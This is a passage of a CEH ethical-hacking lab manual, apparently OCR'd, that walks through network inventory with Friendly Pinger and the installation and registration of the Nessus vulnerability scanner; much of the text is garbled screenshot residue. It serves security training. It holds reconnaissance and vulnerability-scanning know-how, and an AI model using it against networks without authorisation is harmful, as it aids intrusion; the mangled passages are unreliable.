Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

V
File Edit View/ Ping NotificaTion Scan

Friendly Pinger [Default.map]
FWatcher inventory Help

_

□1

x ‫י‬

H ‫>׳״‬
‫ ם‬If you want to ping inside the network, behind the firewall, there will be no problems If you want to ping other networks behind the firewall, it must be configured to let the ICMP packets pass through. Your network administrator should do it for you. Same with the proxy server.

£ ft J* & g

FIGURE 9.8 FPmger Client area with Network architecture 13. T o s c a n th e s e le c te d c o m p u te r in th e n e tw o r k , s e le c t d ie c o m p u te r a n d s e l e c t t h e Sca n t a b f r o m t h e m e n u b a r a n d c li c k Scan
F rie n d ly P in g e r [D e fa u lt.m a p ]
file Edit ‫ם‬ View - y Ping a Notification *
e

Scan M

F W rtc h p

Inventory

Help

^ You may download the latest release: http: / / www. kilievich.com/ fpinger■

Lb

?

Scan..

F61

5 0 *m

click the clicnt area to add c new devicc..

233:1

S i. 3/4/4

^

00:00:47

Q Select ‫״‬File | Options, and configure Friendly Pinger to your taste.

FIGURE 9.9: FPinger Scanning the computers in the Network 14. I t d is p la y s scanned details i n t h e Scanning w i z a r d

C EH Lab Manual Page 164

Ethical Hacking and Countermeasures Copyright O by EC ‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

Scanning
Service & ] HTTP £ ] HTTP Compute W1N-MSSELCK... W1N-D39MR5H... Command f a h ttp://W IN -M S S ELC X 4M 1 http://W IN -D39M R5H L9E 4

£□ Double-click tlie device to open it in Explorer.

S c a n n in g c o m p le te Progress

^‫׳‬J Bescan

? H e lp

y ok

X Cancel

FIGURE 9.10: FPinger Scanned results 1 5 . C l i c k t h e Inventory t a b f r o m m e n u b a r t o v i e w d i e c o n f i g u r a t i o n d e ta i ls o f th e s e le c te d c o m p u te r £□ Audit software and hardware components installed on tlie computers over the network

V
Pk Edit V1«w Ping Notification S<*n

F rie n d ly P in g e r fD e fa u lt.m a p l FWat<hcr Irvcnto

T ^ rr‫־‬

1 ‫ ג‬C a :* B S J m

\ & \ ^ ‫*׳‬

r y\Ndp________________
Ctil-F#

E l Inventory Option!.‫״‬

Tracking user access and files opened on your computer via the network

FIGURE 9.11: FPinger Inventory tab 1 6. T h e General t a b o f t h e Inventory w i z a r d s h o w s d i e com puter name a n d i n s t a l l e d operating system

C EH Lab Manual Page 165

Ethical Hacking and Countermeasures Copyright O by EC ‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

W
File E d it V ie w R eport O p tio n s H e lp

Inventory

la e:
W IN-D39MR5HL9E4 |g General[ Computer/User Misc| M'j

0 ‫־‬S ? 1 1 ■ E
Hardware] Software{ _v) History| ^ K >

CQ Assignment of external commands (like telnet, tracert, net.exe) to devices

Host name User name

|W IN-D39MR5HL9E4 !Administrator

W indows Name Service pack |W indows Server 2012 Release Candriate Datacenter

C otecton tme Colecbon time 18/22 /2 0 12 11 :2 2:3 4 AM

FIGURE 9.12: FPinger Inventory wizard General tab 1 7 . T h e M isc t a b s h o w s t h e Netw ork IP addresses. MAC addresses. File

System , a n d Size o f t h e d is k s 5 Search of HTTP, FTP, e-mail and other network services
Inventory
File E dit V ie w R eport O p tio n s H e lp

x ' <^0

e ig ?

0 ₪ *a a
G*? fieneraj Misc hardware | Software | Network IP addresses MAC addresses 110.0.0.7 D4-BE-D9-C3-CE-2D

History |

J o ta l space Free space

465.42 Gb 382.12 Gb

Display $ettng$ display settings [ 1366x768,60 H z, T rue Color (32 bit)

Disk 3 C

Type Fixed Fixed

Free, Gb 15.73 96.10
■—

Size, Gb 97.31 97.66

£ 84
2

File System NTFS NTFS

A

Function "Create Setup" allows to create a lite freeware version with your maps and settings

S D
— -

FIGURE 9.13: FPinger Inventory wizard Misc tab 18. T h e H ardw are t a b s h o w s t h e h a r d w a r e c o m p o n e n t d e ta i ls o f y o u r n e tw o rk e d c o m p u te rs

C EH Lab Manual Page 166

Ethical Hacking and Countermeasures Copyright O by EC ‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

TT
File Edit View Report Options Help

0 ^ 1 3 1 0
H
w

1N-D39MFS5HL9E4||

General

Miscl

M i

H a rd w a re [^ ]

Software

History |

<

>1

4x Intel Pentium III Xeon 3093 B 4096 Mb - Q j B IO S - £ ) ‫ י‬Monitors

< 2

Memory

Q | AT/AT COMPATIBLE D ELL
Genetic Pn P Monitor D isplays ad ap ters

•6222004 02/09/12

- ■V
E O -

B j ) lnte<R) HD Graphics Family D isk drives
q

^

ST3500413AS (Serial: W2A91RH6)

N etw ork ad ap ters | j | @netrt630x64.inf,%rtl8168e.devicedesc%^ealtekPQeGBE Family Controller S C S I and R A ID controllers @spaceport.inf,%spaceport_devicedesc%;Micro$oft Storage Spaces Controller

-^

I
FIGURE 9.14: FPinger Inventory wizard Hardware tab

J

1 9 . T h e So ftw are t a b s h o w s d i e i n s t a l l e d s o f t w a r e o n d i e c o m p u t e r s Inventory
File Edit View Report Options Help

-----------H 0 ‫י‬€ 1 3 1 0

[£ )Q 5 r
WIN-D39MR5HL9E4 G§* general | M ‫׳‬sc

\

H«fdware| S

Software |

History | QBr < A

>

Q Visualization of your computer network as a beautiful animated screen

Adobe Reader X (10.1.3) eMaiTrackerPro EPSON USB Display Friendfy Priger IntelfR) Processor Graphics Java(TM) 6 Update 17 Microsoft .NET Framework 4 Multi-Targeting Pack Microsoft Appfcation Error Reporting Microsoft Office Excel MUI (English) 2010 Microsoft Office OneNote MUI (English) 2010 Microsoft Office Outlook MUI (English) 2010 Microsoft Office PowerPoint MUI (English) 2010 Microsoft Office Proof (English) 2010 Microsoft Office Proof (French) 2010 Microsoft Office Proof (Spanish) 2010 O ff*** Prnnfirxi (Pnnli^hl ? flirt T e ta S Name Version Developer Homepage |

V

ft

Go

FIGURE 9.15: FPinger Inventory wizard Software tab

L a b A n a ly s is
D o c u m e n t all d i e I P a d d r e s s e s , o p e n a n d c lo s e d p o r t s , s e r v ic e s , a n d p r o t o c o l s y o u d is c o v e r e d d u r i n g d i e la b .

C EH Lab Manual Page 167

Ethical Hacking and Countermeasures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

T o o l/U tility

I n f o r m a tio n C o lle c te d /O b je c tiv e s A c h ie v e d I P a d d r e s s : 1 0 .0 .0 .1 - 1 0 .0 .0 .2 0 F o u n d IP a d d re ss: ■ ■ ■ ■ 1 0 .0 .0 .2 1 0 .0 .0 .3 1 0 .0 .0 .5 1 0 .0 .0 .7

D e t a i l s R e s u l t o f 1 0 .0 .0 .7 : F rie n d lv P in g »er

j

■ ■ ■ ■ ■ ■ ■ ■

C o m p u te r n a m e O p e r a tin g s y s te m IP A d d re ss M A C a d d re ss F ile s y s t e m S iz e o f d i s k H a rd w a re in fo rm a tio n S o ftw a re in f o rm a tio n

Y O U R I N S T R U C T O R IF YOU H A V E Q U E S T I O N S T H I S LAB.

RELATED TO

Q u e s t io n s
1. 2. D o e s F P i n g e r s u p p o r t p r o x y s e r v e r s fire w a lls? E x a m i n e th e p r o g r a m m i n g o f la n g u a g e u s e d i n F P in g e r .

I n te r n e t C o n n e c tio n R e q u ire d

□ Yes Pla tfo rm Supported 0 C lassroom

0 No

0 iL a b s

C EH Lab Manual Page 168

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

M o d u le 0 3 - S c a n n in g N e tw o rk s

Lab

Scanning a Network Using the N essus Tool
N e s s / z sallowsyou tore m o te lyaudita nehvorkandd e te r/ n in eif it has b e e nb ro k e n into orm is u s e din s o m enay.It alsoprovidesth eability tolocally audita sp ecific m a c h in e for vulnerabilities.
I C O N K E Y

L a b S c e n a r io
111 t h e p r e v i o u s l a b , y o u l e a r n e d t o u s e F r i e n d l y P i n g e r t o m o n i t o r n e t w o r k d e v i c e s , r e c e i v e s e r v e r n o t i f i c a t i o n , p i n g i n f o r m a t i o n , t r a c k u s e r a c c e s s v ia t h e n e t w o r k , v i e w g r a p h i c a l t r a c e r o u t e s , e tc . O n c e a t t a c k e r s h a v e t h e i n f o r m a t i o n re la te d to n e tw o r k d e v ic e s , th e y c a n u s e i t as a n e n tr y p o i n t to a n e tw o r k f o r a c o m p r e h e n s iv e a tta c k a n d p e r f o r m m a n y ty p e s o f a tta c k s ra n g in g f r o m D o S a tta c k s to u n a u th o r iz e d a d m in is tra tiv e access. I f a tta c k e rs a re a b le to get tr a c e r o u t e in f o r m a t io n , th e y m i g h t u s e a m e t h o d o lo g y s u c h as fire w a lk in g to d e t e r m i n e t h e s e r v i c e s t h a t a r e a l l o w e d t h r o u g h a f ir e w a ll. I f a n a tta c k e r g a in s p h y s ic a l a c c e s s to a s w itc h o r o t h e r n e tw o r k d e v ic e , h e o r s h e w ill b e a b l e t o s u c c e s s f u l l y i n s t a l l a r o g u e n e t w o r k d e v i c e ; t h e r e f o r e , a s a n a d m in is tra to r, y o u s h o u ld d is a b le u n u s e d p o r ts in th e c o n f ig u r a tio n o f th e d e v ic e . A l s o , i t is v e r y i m p o r t a n t t h a t y o u u s e s o m e m e t h o d o l o g i e s t o d e t e c t s u c h r o g u e d e v ic e s 0 1 1 th e n e tw o rk . A s a n e x p e r t ethical h ack er a n d penetration tester, y o u m u s t u n d e r s t a n d h o w

7 =

7‫־‬

Valuable information Test your knowledge Web exercise

m

W orkbook review

vulnerabilities, com pliance specifications, a n d content policy violations a r e
s c a n n e d u s i n g t h e Nessus t o o l .

L a b O b j e c t iv e s
T h i s l a b w ill g iv e y o u e x p e r i e n c e 0 1 1 s c a n n i n g t h e n e t w o r k f o r v u l n e r a b i l i t i e s , a n d s h o w y o u h o w t o u s e N e s s u s . I t w ill t e a c h y o u h o w to : ■ ■ U s e th e N e s s u s to o l S c a n th e n e tw o r k f o r v u ln e r a b ilitie s

C EH Lab Manual Page 169

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

L a b E n v ir o n m e n t
£ ‫ ז‬Tools demonstrated in this lab are available in D:\CEHTools\CEHv8 Module 03 Scanning Networks
T o c a n y o u t d ie la b , y o u n e e d : ■ N e s s u s , l o c a t e d a t D:\CEH-Tools\CEHv8 Module 03 Scanning

N etw orksW ulnerability Scanning Tools\Nessus
■ Y o u c a n a ls o d o w n l o a d t h e l a t e s t v e r s i o n o f N e s s u s f r o m t h e l i n k h t t p : / / w w w . t e n a b l e .c o m / p r o d u c t s / n e s s u s / n e s s u s - d o w n l o a d a g re e m e n t ■ I f y o u d e c i d e t o d o w n l o a d t h e latest version, t h e n s c r e e n s h o t s s h o w n in th e la b m ig h t d if fe r ■ ■ ■ A c o m p u t e r r u n n i n g W indow s Server 2012 A w e b b ro w s e r w ith I n te r n e t access A d m in is tr a tiv e p riv ile g e s to r u n th e N e s s u s to o l

L a b D u r a t io n
T im e : 2 0 M i n u te s

Nessus is public Domain software related under the GPL.

m

O v e r v ie w o f N e s s u s T o o l
N e s s u s h e lp s s t u d e n t s t o le a r n , u n d e r s t a n d , a n d d e t e r m i n e vulnerabilities a n d

w eaknesses o f a s y s te m a n d network 111 o r d e r t o k n o w h o w a s y s te m c a n b e exploited. N e t w o r k v u ln e r a b ilitie s c a n b e network topology a n d OS vulnerabilities, o p e n p o r t s a n d r u n n i n g s e r v ic e s , application and service
c o n f i g u r a t i o n e r r o r s , a n d a p p li c a ti o n a n d service vulnerabilities.

Lab T asks 8 TAs K 1
Nessus Installation
1. T o i n s t a l l N e s s u s n a v i g a t e t o D:\CEH-Tools\CEHv8 Module 03

Scanning Netw orksW ulnerability Scanning Tools\Nessus
2. 3. D o u b l e - c l i c k t h e Nessus-5.0.1-x86_64.msi file . T h e Open File - Secu rity Warning w i n d o w a p p e a r s ; c li c k Run
O p e n File S e c u rit y W a r n in g

‫־ד‬5‫ך‬

Do you want to run this fie ?
fJan e‫־‬ /lk g rt\A d m in irtrat0 r\D etH 0 D 'v N e cs1 K -5 0 -6

2 £ & ‫ר‬ C .r r K

Pud sht‫׳‬:

IcnaMc Network Security Int.

Type Windows Installer Package

From; G\U«ra\Adminottatot\Doklop\No>uj*5.0.2-*66 64‫״‬
Run CencH

"^7 Nessus is designed to
automate the testing and discovery of known security problems.

V Always esk cefcre opening the file

Wh Jr fi:« from the Internet can be useful, this file type can potentially j ) harm >our computer. Only run scfbveic from p ubltihen yen bust. ^ What s the nsk?

FIGURE 10.1: Open File ‫ ־‬Security Warning

C EH Lab Manual Page 170

Ethical Hacking and Countermeasures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

4.

T h e N essus - InstallShield Wizard a p p e a r s . D u r i n g t h e i n s t a l l a t i o n p r o c e s s , th e w iz a r d p r o m p ts y o u f o r s o m e b a s ic in f o r m a tio n . F o llo w d i e i n s t r u c t i o n s . C l i c k Next.

&

Tenable Nessus (x64) ‫ ־‬InstallShield Wizard
W elcome to th e InstallShield Wizard for Tenable N essus (x64)

The updated Nessus security checks database is can be retrieved with commands nessus-updatedplugins.

m

The InstalSh1eld(R) W izard w dl nstal Tenable Nessus (x64) on your computer. To continue, ddc Next.

W A RN IN G : Ths program is protected by copyright law and nternational treaties.

< Back

Next >

Cancel

FIGURE 10.2: The Nessus installation window 5. B e f o r e y o u b e g i n i n s t a l l a t i o n , y o u m u s t a g r e e t o t h e license agreem ent a s s h o w n i n t h e f o l l o w i n g f ig u r e . 6. S e l e c t t h e r a d i o b u t t o n t o a c c e p t t h e l i c e n s e a g r e e m e n t a n d c li c k Next.

!‫;ל‬
Q Nessus has the ability to test SSLized services such as http, smtps, imaps and more.

Tenable Nessus (x64) - InstallShield Wizard

License Agreement Please read the following kense agreement carefully.

Tenable Network Security, Inc. NESSUS® software license Agreement
This is a legal agreement ("Agreement") between Tenable Network Security, Inc., a Delaware corporation having offices at 7063 Columbia Gateway Drive. Suite 100, Columbia, MD 21046 (“Tenable"), and you, the party licensing Software (“You‫)״‬. This Agreement covers Your permitted use of the Software BY CLICKING BELOW YOU !unir.ATF v m iB Ar.r.FPTAMr.F n p tw /.q ArtPFPMFUT auh 0 Print accept the terms in the kense agreement O I do not accept the terms n the kense agreement InstalShiekJ------------------------------------------< Back Next > Cancel

Nessus security scanner includes NASL (Nessus Attack Scripting Language).

FIGURE 10.3: Hie Nessus Install Shield Wizard 7. S e le c t a d e s t i n a t i o n f o l d e r a n d c li c k Next.

C EH Lab Manual Page 171

Ethical Hacking and Countermeasures Copyright O by EC ‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

Tenable Nessus (x64) - InstallShield Wizard
Destination Folder C lick Next to instal to this folder, or ckk Change to instal to a different folder.

Ibdl Nessus gives you the choice for performing regular nondestructive security audit on a routinely basis.

£>

Instal Tenable Nessus (x64) to: C:\Program F*es\TenableNessus \

Change...

InstalShield < Back Next > Cancel

FIGURE 10.4: Tlie Nessus Install Shield Wizard 8. T h e w i z a r d p r o m p t s f o r Setup Type. W i d i d i e Complete o p t i o n , a ll p r o g r a m f e a t u r e s w ill b e i n s t a l l e d . C h e c k Complete a n d c li c k Next.

Tenable Nessus (x64) ‫ ־‬InstallShield Wizard
Setup Type Choose the setup type that best smts your needs.

Q Nessus probes a range of addresses on a network to determine which hosts are alive.

FIGURE 10.5: The Nessus Install Shield Wizard for Setup Type 9. T h e N e s s u s w i z a r d w ill p r o m p t y o u t o c o n f i r m t h e i n s t a l l a t i o n . C li c k

Install

C EH Lab Manual Page 172

Ethical Hacking and Countermeasures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

Tenable Nessus (x64) - InstallShield Wizard
Ready to Install the Program
Nessus probes network services on each host to obtain banners that contain software and OS version information

The wizard is ready to begn nstalation. C lick Instal to begn the nstalatoon. If you want to review or change any of your installation settings, dfck Back. Ckk Cancel to exit the wizard.

InstalShield < Back Instal Cancel

FIGURE 10.6: Nessus InstallShield Wizard 1 0 . O n c e i n s t a l l a t i o n is c o m p l e t e , c li c k Finish.

Tenable Nessus (x64) ‫ ־‬InstallShield Wizard
In stalS hield W izard Completed

Q Path of Nessus home directory for windows \programfiles\tanable\nessus

The InstalShield W izard has successfuly nstaled Tenable Nessus (x64). Ckk Finish to exit the wizard.

Cancel

FIGURE 10.7: Nessus Install Shield wizard

Nessus Major D irectories
■ T l i e m a j o r d i r e c t o r i e s o f N e s s u s a r e s h o w n i n t h e f o l l o w i n g ta b l e .

C EH Lab Manual Page 173

Ethical Hacking and Countermeasures Copyright O by EC ‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

Nessus Home Directory 1Windows \Program Files\Tenable\Nessus
feUI During the installation and daily operation of Nessus, manipulating the Nessus service is generally not required

Nessus Sub-Directories

Purpose

\conf \data \nessus\plugins \nassus\us«rs\<username>\lcbs \no33us\logs

Configuration files Stylesheet templates Nessus plugins User knowledgebase saved on disk

-------------------------------- -1 >

, Nessus log files --------------------1

TABLE 10.1: Nessus Major Directories 11. A f te r in s ta lla tio n N e s s u s o p e n s in y o u r d e fa u lt b ro w s e r. 1 2 . T h e W elcom e to Nessus s c r e e n a p p e a r s , c li c k d i e here l i n k t o c o n n e c t v ia S S L

w e lc o m e to Nessus!
PI m m c o n n e c t v i a S S L b y c lic k in c J h » r « . You are hkely to get a security alert from your web browser saying that the SS L certificate is invalid. You may either choose to temporarily accept the risk, or can obtain a valid S S L certificate from a registrar. Please refer to the Nessus documentation for more information.

FIGURE 10.8: Nessus SSL certification 1 3 . C li c k OK i n t h e Secu rity Alert p o p - u p , i f i t a p p e a r s

Security Alert
— The Nessus Server Manager used in Nessus 4 has been deprecated

‫ע‬

J j You are about to view pages over a secure connection.
Any information you exchange with this site cannot be viewed by anyone else on the web. ^In the future, do not show this warning OK More Info

FIGURE 10.9: Internet Explorer Security Alert 14. C li c k t h e Continue to this w ebsite (not recommended) l i n k t o c o n tin u e

C EH Lab Manual Page 174

Ethical Hacking and Countermeasures Copyright O by EC ‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

&

* ^

II

C crtfica te Error: M avigation... '

X

Snagit g j

£t

1

There is a problem with this website's security certificate.
The security certificate presented by this w ebsite w as not issued b y a trusted certificate authority. The security certificate presented by this websrte w as issued fo r a different w eb site s address. Sccu n ty certificate problem s m a y indicate an ottem pt to fool y o u o r intercept a n y data you send to the server.

W c recommend that you close this webpage and do not continue to this website.
d Click here to close this webpage. 0 Continue to this website (not recommended). M ore information

FIGURE 10.10: Internet Explorer website’s security certificate 1 5. o n OK i n t h e Secu rity Alert p o p - u p , i f i t a p p e a r s . £Q! Due to die technical implementation of SSL certificates, it is not possible to ship a certificate with Nessus that would be trusted to browsers

Security Alert

tr

1 C. i )

You are about to view pages over a secure connection Any information you exchange with this site cannot be viewed by anyone else on the web. H I In the future, do not show this warning

1

OK

More Info

FIGURE 10.11: Internet Explorer Security Alert 1 6 . T h e Thank you for installing Nessus s c r e e n a p p e a r s . C l i c k t h e Get

Started > b u t t o n .

R ff
W elcom e to N e s s u s ‫׳‬

warning, a custom certificate to your organization must be used

m

T W ik you foi liintrtllli •j

tin• w uM 1

•> > <h *H i

N m iii •v* tflknv y!> u l< 1 portoim

1I *ah 3pe«d vukierntilNty diSEOvery. to detem\r* *tven hcets are rumlna wttich se1v1r.es 1 A1 j« n lU 1a 1 mtrlili mj, la 1m U w t« no Im l )■ » ia •acurlly |W ■ I w. >L-umplianca chocks, to verify and prove that « v v , host on your network adheres to tho security pokey you 1 ‫ י‬Scan sehwliJnm, to automatically rui *cant at the freijwncy you ‫ ׳‬And morel

!!•< stofted *

FIGURE 10.11: Nessus Getting Started 1 7 . 111 Initial Account Setup e n t e r t h e c r e d e n t i a l s g i v e n a t t h e t i m e o f r e g i s t r a t i o n a n d c li c k Next >

C EH Lab Manual Page 175

Ethical Hacking and Countermeasures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

p

•o ( « * • * < ‫״‬ * » . ‫״‬ > .e c

Wefconeu Neaus

In itia l Account Setup
First, w e need to create an admin user for the scanner. This user will have administrative control on the scanner; the admin has the ability to create/deiete users, stop ongoing scans, and change the scanner configuration.

loo*n: admin Confirm P«*Mword: < Prev | Next > |

Because f/* admin user can change the scanner configuration, the admin has (he ability to execute commands on the remote host. Therefore, It should be
i that the admin user has the same privileges as the *root ‫( ״‬or administrator) user on the remote ho:

FIGURE 10.12: Nessus Initial Account Setup 1 8 . 111 Plugin Feed Registration, y o u n e e d t o e n t e r d i e a c t i v a t i o n c o d e . T o o b t a i n a c t i v a t i o n c o d e , c li c k t h e

http://www.nessus.org/register/ lin k .

19. C li c k t h e Using Nessus at Home i c o n i n Obtain an Activation Code

>

■ el

If you are using Hie Tenable SecurityCenter, the Activation Code and plugin updates are managed from SecurityCenter. Nessus needs to be started to be able to communicate with SecurityCenter, which it wfll normally not do without a valid Activation Code and plugins

m

m i (A *CAftCM i n ‫ז‬

<9>T E N A B L E Network Security*
I n Certift&ttH)!! Resource* Supicot

if'tMhk■ ProdiKls * Protfua Ovenfe Nk s u i AudHai

Obtain an Activation Code
Using Nesaus at Work?
A wuk1uV4cM * f u < ail

n lu 1 .

Using Nessus at Home?
A Ham■( ■ml »m>*Cripr«l Is Dm jn l t o th tm Mia ootj

'!‫•׳‬ • • Ml‫ ׳‬Plug**

.Sjirplr Report! N«MUi FAQ Vk«le D»14CMFAQ Dtptovmam 1> :001u Mowus Evukoiion Training

in

FIGURE 10.13: Nessus Obtaining Activation Code 2 0 . 111 N essus for Home a c c e p t t h e a g r e e m e n t b y c l i c k i n g t h e Agree b u t t o n a s s h o w n in th e fo llo w in g fig u re .

C EH Lab Manual Page 176

Ethical Hacking and Countermeasures Copyright O by EC ‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

Wckcme 1 0Mawt

■ Mom fc<Mama|t«nat1 l«

ow*« m ss
t *vtl ProtoiaiOAilFaed iubbcflbaf* enjty You mat •otu u 1 . The Netare rtoaaafocd do*1 *c* gn* you i o : w to of 1 K0 v >yov to perform < dedR 0 ( *S* Tw Nes*u» llrtual

Product Ovenv*
Faaiuraa Nossue W*y Buwwct to New#* ‘t‫־‬ ’ Noasus ter Homa Nesius V « 1lf A!(n

1 Nmhh Hom Fnd Mibscilpllon it a■alatile lot ptnoia) mm ‫ •י‬a I ( o• tf. * Is ink lot use by any commercial otqam/atn■ t !on 1 q «t!

c *«»*| or vw *Inm * iiw M n i tr.iinrvj
Trtontoa Ptoarjm tor 0< >1r(;■ ttio n f. ‫ » ז‬a ro a jJ •#! 1k* M m ii HowFbwJ Mtncri|40n lot lo » 1 «m | f c w cfe* ‘^7 ‫ ’••׳‬to k u « i *to turn• 0 1•M 4ml bwjln iho < Jc ‫׳‬#nlMd prooaat• SU8VCWII0M ACM I Ml NI

N W III PluflM S41v(Ju Rapotto N m a i fAQ M<«I6 Dtotc** FAQ Deployment Options

• ‫* «׳״‬Suy^otW w m •‫•יי‬Ini 01 Ope‫״‬nlr*j SyvtMn otw Mbwaowi) m oa>«»« 1 ■to• 1mvCcI •vaeelto ncto«n| n n u n M o iy IVrjalAQor rtaouis fA<J lound cti arr, lenaUa K» •• Ratoawonarf-aod S«4xc>|pt«n You agiaa 10 r«v * «*•<> «<«* to• to Tt^aUa to ••ach ayatoan on which You have inttaltod a Prjntr'Kl Scama• T‫<«» ׳‬pj Ojaniriton MiVAPthntandiuj 1 N » pit^ifcrtcn ow cotnwcM »a* m S*C»m 2141.1 Vau ara * *atimj 01!>trifi10n You m*» copy M M iwget * 4 •MMMaM T t N t V t »IM«M Md Tm1U» HonMF«*d s<Mot*«M rwgto to —< 1 rt>to »1 *dto« *♦ ew‫׳‬w 00‫׳‬tn teeing onV Upon eompte^oti ot #* d m t*» rigM to * a lt> « Pkj£n& ptmUtod by to* HomaFaad SubfeuipCanis Ptc/w*‘. ;■wFwd SK.t‫־‬vjlp‫־‬i:»1 («. *(fle a b*e n * • ,ox !tent# •*> toe Suts<‫־‬i * ‫־‬ *0 ‫״‬ c«aa( an r«ftj (of 4nd pay 81) !« ‫■׳‬ > associated « P Tmi Su&ttrfpaa• You awv not u&a tw H>r‫ *׳‬f sad Subscripted 91anted to You lot *‫־‬ !■ inj p u > p 0M± to aacuf• Y«u>01 any third party's, laatwoifcs or to any etoa■ tw cl«M«o« taning h * rorvpioductrxi «nv»or1‫׳‬r> *r1• T e a M a m tofanuci a fr«* Sut«rp#on undat this Suction 21c|al t coti apmant and DiMnbttoan tenable I C is t* Metsus Ftogm Deralopment 1 « & ‫ ״‬JM ■am at lha Subbcitpttaoa 1 0wtto and dovobp 1

FIGURE 10.14: Nessus Subscription Agreement

21
S l f you do not register your copy of Nessus, you will not receive any new plugins and will be unable to start the Nessus server. Note: The Activation Code is not case sensitive.

F ill i n t h e R egister a Hom eFeed s e c t i o n t o o b t a i n a n a c t i v a t i o n c o d e a n d c li c k Register.

ENTER SEARCH TEXT

* TEN A BLE Network Security
Partner* 1raining li fortification Resources Si port > paint |

GO!

!e n a b leP r o d u c t s
Product O v m v Iow No s m s Auditor OuniSes N«84u « Ptu^lns Documentation Sample Repoita N*5»u 9 FAQ Motde Devices FAQ Deployment Options Nes3u3 Evaluation Training

Register a HomeFeed

‫ס‬

T0 May up todato with 1 1 m * Nut.uit. pljgint you n w tl tt> ■ ; etrnU iMlilte-11 to utilch an activation code wll be *ert Ye th a r td with any 3rd patty.

1 «# h4v jfe d
> 1 1 U nil! not I

■ ‫•־‬ a m »*

con^

□ Check lo receive updates from Tenable |

H pql^ter

|

FIGURE 10.15: Nessus Registering HomeFeed 2 2 . T h e Thank You for Registering w i n d o w a p p e a l s f o r Tenable Nessus

HomeFeed.

C EH Lab Manual Page 177

Ethical Hacking and Countermeasures Copyright C by EC ‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

. ‫׳‬V j .

*> ■« Y«.to ‫י‬ ENTER SEARCH IE■(

TENABLE Network Security1
Solutions

Products

Services

Partners

iraimna & certification

Resources

Support

Atout !enable

Store

> print | » sltare Q

T en able P ro d u c ts

nessus

Thank You for Registering!
Thank jrou tor reghlMlag your I eonbit‫ ׳‬Nt-viun HomeFeed An emal conraMng w a activation 604• hA* just boon Mint to you •l tie email K k tm you pravWed Please note *at tie !enable Nessus HomeFeed h uvislU iM t- for home um oo»r If you wantto use Nasaus at your place of business, you nuat ouicnase the Nessus Proleaaowageed Akemaiet. you nay purchase a subscriptionto the Nessus PofimoHM Sarnica and scan in tM cioudl Tha N a ttu i Ponawlci Service does no( require any software download.
For more mtetraabon on t w HomsFeed. Professional eed and Nessus Perimeter Sec.ice. please visit our Discussions Forum.

Tenable Charitable & !raining Organization Program
Tenable N c t in il Security offers Nessus l ‫ ׳‬rot••won•( •*4 •uMcnpcon• •t no cod to ct1*ftut4• oroartaation• I

Product Overview Nessus Auditor Bundles Nessus Plugins Documentation

217After the initial registration, Nessus will download and compile the plugins obtained from port 443 of plugins.nessus.or gpluginscustomers.nessus .org

Sample Reports Nessus FAQ Mobile Devices FAQ Deployment Options S m u t Evaluation I raining

FIGURE 10.16: Nessus Registration Completed 2 3 . N o w lo g in to y o u r e m a il f o r th e a c tiv a tio n c o d e p r o v id e d a t th e tim e o f r e g is tr a tio n as s h o w n in th e fo llo w in g fig u re .

P
|
Y

<d
X

• uflKfccjr
_ uSmqSma yaH00.C0‫׳‬n ' •

- S m > C u 1 Omu >
a h o o

! m a il

1b4e Homefeeo Activation CoO* ‫ י‬NMtut K ig L iio i 10 •

MIMDttalt

aw‫ ■ ׳‬. ■ounoooor*

th«r* )Oulw rtanlairtj row N n w i m » w 1 * w sully gcannng »you usa rusius n ‫ ג‬professorial 09301 10u

Th* W««U» Hamafaad gubKiCton will >*er |M» Netful a ftcftsslcruiFoaa suBcagimi

<• % ) «w * •‫ *י‬tiel*le 4 1■ lupntlw

1

ms • r , 3onMme 0»

n‫׳‬cu ir-n‘1 4 *aorta

\-‫ ״־‬is > 0u •11t1wo»repsK<trasc3rr>»ri1(».f1if10t.‫ו‬ C « «u sn g 1nt srcceSires Stlpw.

‫ ‘ •**׳‬:

PtaawconW t If!• Nmmii n*tt »wn ^•9» Ne inttmal Aixeii «‫ ״‬i w Mnaui *‫ « *׳‬- '‫׳‬ M>t« tl'MU• inttiiiilnr camoi‫ •׳‬a t * 1 ‫•׳‬ You an Andottna ic-jlsti 1 t»jr m ilv a n at

i 1

■ w* ^ . ,Twwjuaiiu.'Ui'ntrHntantMuyMHiiimuum" ‫• ***יי ״‬
t— «** ‫״‬e»a *aM e• in anamit* p‫«»״״‬.»* y >p* tia uw. ana c*>»* M t x caaa toittiaiaftBfl

I cnm ««!• S T O C M t
>* 1 • ‫•יזו‬MatpUJ-<n»

FIGURE 10.17: Nessus Registration mail 2 4 . N o w e n t e r t h e a c t i v a t i o n c o d e r e c e i v e d t o y o u r e m a i l I D a n d c li c k Next.

C EH Lab Manual Page 178

Ethical Hacking and Countermeasures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

